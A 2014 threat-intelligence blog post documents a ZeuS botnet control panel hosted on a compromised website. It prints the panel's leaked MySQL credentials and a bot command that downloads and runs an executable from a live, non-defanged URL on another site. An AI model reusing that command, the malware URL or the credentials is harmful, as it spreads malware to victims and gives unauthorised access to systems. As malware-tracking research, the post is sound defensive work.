Sunday, January 12, 2014

ZeuS 2.1.0.1 - inlandbeardeddragons.com

Found C&C via ZeuS Tracker.

Panel was at:
hxxp://inlandbeardeddragons.com/templates/beez/.ama/cp.php?m=login

46 bots
Config:
$config['mysql_host'] = 'localhost';
$config['mysql_user'] = 'inlandbe_ama';
$config['mysql_pass'] = '1qaz2wsx';
$config['mysql_db'] = 'inlandbe_ama';

Running script:
user_execute http://eyecatchersoptique.com/images/.stnfrn/server/a.exe

Admin was moving bots to ZeuS 2.9.6.1

This is from the same admins researched here.

a.exe
https://www.virustotal.com/en/file/cac8ede4d09c2728f12421b6648da204e5a84561ebf3d9012fe39e0aa83a56fb/analysis/1389472180/

https://malwr.com/analysis/YjdiNThhZjc3MThmNGZmYmE3NmMwYThlNzZhMzdjYmY/
